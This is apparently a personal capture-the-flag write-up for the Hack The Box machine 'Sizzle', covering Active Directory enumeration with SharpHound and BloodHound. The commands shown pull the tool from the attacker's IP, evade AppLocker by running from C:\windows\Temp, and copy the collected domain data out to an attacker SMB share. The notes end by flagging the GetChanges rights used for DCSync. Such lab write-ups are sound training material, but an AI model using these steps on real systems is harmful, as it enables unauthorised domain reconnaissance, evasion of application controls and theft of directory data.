Sizzle
05-Nmap
10-Enumeration
15-SMB
20-GetAmanda
25-Bloodhound
30-Getting-mrlky
35-GetNTAuthority
25-Bloodhound

transferred sharphound.exe to target machine

PS htb\amanda@SIZZLE Documents> curl http://10.10.14.10/SharpHound.exe -OutFile sharphound.exe
Enter PEM pass phrase:
PS htb\amanda@SIZZLE Documents>

Error while running the exe file

.PS htb\amanda@SIZZLE Documents>.\sharphound.exe
Program 'sharphound.exe' failed to run: This program is blocked by group policy. For more information, contact your system administratorAt line:1 char:1
+ .\sharphound.exe
+ ~~~~~~~~~~~~~~~~.
At line:1 char:1
+ .\sharphound.exe
+ ~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed

App locker bypass
I ll copy it to a place where users write stuff like in temp
https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md

Successful

PS htb\amanda@SIZZLE Documents> copy sharphound.exe C:\windows\Temp
Enter PEM pass phrase:
PS htb\amanda@SIZZLE Documents> cd C:\windows\temp
PS htb\amanda@SIZZLE temp> ./sharphound.exe
2024-01-14T11:32:54.1055361-05:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-01-14T11:32:54.2774159-05:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-01-14T11:32:54.3086946-05:00|INFORMATION|Initializing SharpHound at 11:32 AM on 1/14/2024
2024-01-14T11:32:54.4805358-05:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for HTB.LOCAL : sizzle.HTB.LOCAL
2024-01-14T11:32:54.5117913-05:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-01-14T11:32:54.7774101-05:00|INFORMATION|Beginning LDAP search for HTB.LOCAL
2024-01-14T11:32:54.8242859-05:00|INFORMATION|Producer has finished, closing LDAP channel

i was not able to list files in tmp dir ->

PS htb\amanda@SIZZLE Temp> dir
Access to the path 'C:\windows\Temp' is denied.
At line:1 char:1
+ dir
+ ~~~
    + CategoryInfo          : PermissionDenied: (C:\windows\Temp:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand

so i guessed the bloodhoundfile name
It uses this format to name the files -> YYYYMMDDHHMMSS_BloodHound.zip.

PS htb\amanda@SIZZLE Temp> copy 20240114224703_BloodHound.zip C:/users/amanda/Desktop
Enter PEM pass phrase:

PS htb\amanda@SIZZLE Desktop> dir


    Directory: C:\users\amanda\Desktop


Mode                LastWriteTime         Length Name                                                                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                                                                    
-a----        1/14/2024  10:47 PM          11560 20240114224703_BloodHound.zip

Pasted image 20240115092241.png

PS htb\amanda@SIZZLE Desktop>  net use S: \\10.10.14.10\s /user:ctf lover
Enter PEM pass phrase:
The command completed successfully.

copy 20240114224703_BloodHound.zip S:\

Pasted image 20240115095038.png

Pasted image 20240115095050.png

Pasted image 20240115095212.png

Exploit
...

in short The principal getchanges is not bad until, We have Get-changes-all principal

And we have both get-changes and Get-changes-all

But first i need to escalate to mrlky user.

Table Of Contents

25-Bloodhound

Exploit